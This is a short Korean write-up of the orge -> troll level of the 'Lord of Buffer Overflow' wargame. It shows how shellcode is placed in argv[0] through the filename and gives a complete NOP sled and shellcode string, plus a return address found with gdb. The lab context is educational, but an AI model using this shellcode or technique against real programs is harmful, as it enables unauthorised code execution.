LOB - 8. orge -> troll

어떤 새로운 함정이 새로 생겼는지 확인해보자.

//onemore 부분에서 새로운게 생겼다.

argv[1]도 초기화시키는 명령같다. 그러면 우리가 쉘코드를 입력할 수 있는 자리는 argv[0] 밖에 없다고 할 수 있다.

이름이 argv[0] 부분이니 이름을 쉘코드를 넣는 것으로 바꾸어주자.

쉘코드는 "\x2f"가 없어야해서 구글링해서 퍼왔다.

파일명 : `python -c 'print "\x90"*200 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

그리고 리턴값을 줘야하는데 조건을 만족해주기위해 "\xbf"로만 넣어준다. 당연히 한번에 bash를 얻을 수 는 없을 것이다.

코어가 덤프되었으니 코어를 분석하다

gdb -c core

처음엔 "\x70\xf8\xff\xbf"가 리턴주소같아서 저기로 해보았지만 실패했다.

그래서 더 내려가보니 

"\x5f\xf9\xff\xbf"이 부분이 리턴주소라는 생각이 들었고 바로 입력해보았다.

어랏...풀리네 ㅎㅎ

(grin)